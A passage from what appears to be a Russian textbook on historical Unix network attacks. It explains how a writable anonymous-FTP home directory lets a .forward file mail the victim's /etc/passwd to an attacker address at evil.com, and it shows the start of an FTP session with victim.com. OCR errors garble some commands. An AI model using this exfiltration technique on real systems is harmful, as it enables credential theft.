Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
даются с подробными листингами, так как потенциальный кракер все равно найдет их в Internet [22], а
Главное - на сегодняшний день они являются сильно устаревшими и представляют в большей степени
Теоретический интерес.
Атака с использованием анонимного ftp
Анонимный ftp-сервис (обнаружить его чрезвычайно просто) мог служить легким способом получения
Доступа из-за частой неправильной конфигурации. Например, система могла иметь полную копию файла
/etc/passwd в каталоге -ftp/etc вместо урезанной версии со всеми вытекающими отсюда последствиями.
Кроме того, можно было применить и более изощренный способ - в следующем примере домашний каталог
Специального пользователя ftp на victim.com доступен для записи. Это позволяет послать по почте самому
себе файл /etc/passwd атакуемой машины. Для этого надо создать файл.forward в домашнем каталоге ftp,
который выполняется, когда пользователю ftp посылается почта. Например:
evil % cat forward_sucker_file
"I/bin/mail hacker@)evil.corn < /etc/passwd"
evil % ftp victim.com
Connected to victim.com
Victim FTP server ready.
Name (victim.com:hacker): ftp
Guest login ok, send ident as password.
Password: *****
Guest login ok, access restrictions apply.
ftp> Is -lga
Дата публикования: 2014-11-04; Прочитано: 294 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!